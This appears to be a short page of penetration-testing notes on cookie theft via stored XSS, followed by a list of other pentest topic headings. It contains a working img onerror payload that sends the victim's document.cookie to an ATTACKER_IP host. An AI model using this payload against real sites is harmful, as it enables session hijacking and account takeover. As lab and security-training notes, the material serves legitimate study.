Cookie Theft

Stored / Hosted XSS

If there is a vulnerability where you can store or submit HTML and have it rendered on the page or some other client-side application, then the src=x condition would trigger the onerror= attribute and cause the target to execute the JavaScript and send their user cookie back to the attacker in the ?cookie parameter.

<img src=x onerror="document.location='http://ATTACKER_IP/?cookie='+document.cookie" />

See https://benheater.com/hackthebox-iclean/ for example.

Using an Ad-Hoc Nginx Server to Catch-Web Requests

Using an Ad-Hoc Python Web Server to Catch HTTP Client Requests

FFUF

Gobuster

Burp Chromium Browser Always Upgrades to TLS

Constrain Burp Memory Usage

Data Exfiltration

Cookie Theft

Manual Testing with cURL

git-dumper

Mining Data from Git Repos

jq

Finding Build Manifests

Install Ghauri on Kali Linux

Multipart Forms and Boundary Parameters

Manual Enumeration with Nmap

Cookie Theft

Stored / Hosted XSS